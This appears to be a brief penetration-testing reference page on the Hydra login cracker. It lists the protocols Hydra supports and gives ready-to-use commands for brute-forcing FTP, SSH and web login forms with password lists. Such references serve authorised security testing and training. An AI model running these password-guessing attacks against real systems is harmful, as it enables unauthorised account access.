Hydra
Fast Network Logon Cracker
Last updated
Fast Network Logon Cracker
Last updated
Hydra supports the following:
Asterisk, Cisco, FTP, HTTP, HTTPS, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle, PCNFS, POP3, POSTGRES, Radmin, RDP, RSH, RTSP, SMB, SMTP, SNMP, SSH, TS2, Telnet, VNC, etc.
hydra -l user -P passlist.txt ftp://$IP
hydra -l $USER -P $PASSLIST $IP -t 4 ssh
-l
specifies the username for login
-P
indicates a list of passwords
-t
sets the number of threads to spawn
sudo hydra -l $USER -P $WORDLIST $IP http-post-form "$PATH:$CREDS:$INVALID"
Example: sudo hydra -l admin -P passlist.txt 10.10.10.10 http-post-form "/login.php:username=^USER^&password=^PASS^:incorrect" -V -f